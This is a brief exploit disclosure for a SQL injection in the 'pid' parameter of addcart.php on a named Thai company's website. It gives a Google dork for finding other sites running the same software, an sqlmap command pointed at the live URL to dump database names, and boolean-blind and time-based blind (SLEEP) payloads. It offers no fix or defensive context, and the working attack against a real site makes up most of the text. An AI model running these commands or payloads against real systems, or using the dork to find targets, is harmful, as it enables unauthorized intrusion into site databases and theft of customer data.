****************************
#Exploit Title: scleather - SQL Injection vulnerability
#Date: 2021-06-27
#Exploit Author: Mahdi Karimi
#Vendor Homepage: www.scleather.co.th
#Google Dork: "Powered by scleather"
#Tested On: windows 10
sqlmap:
sqlmap -u "http://www.scleather.co.th/addcart.php?pid=1096" --dbs
Testing Method;
- boolean-based blind
- time-based blind
Parameter: pid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=1096' AND 5351=5351 AND 'YCAF'='YCAF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: pid=1096' AND (SELECT 8639 FROM (SELECT(SLEEP(5)))WmEq) AND 'HjJG'='HjJG
**************************************************
#Discovered by: Mahdi Karimi
#Email : mjoker22mjoker22@gmail.com
**************************************************
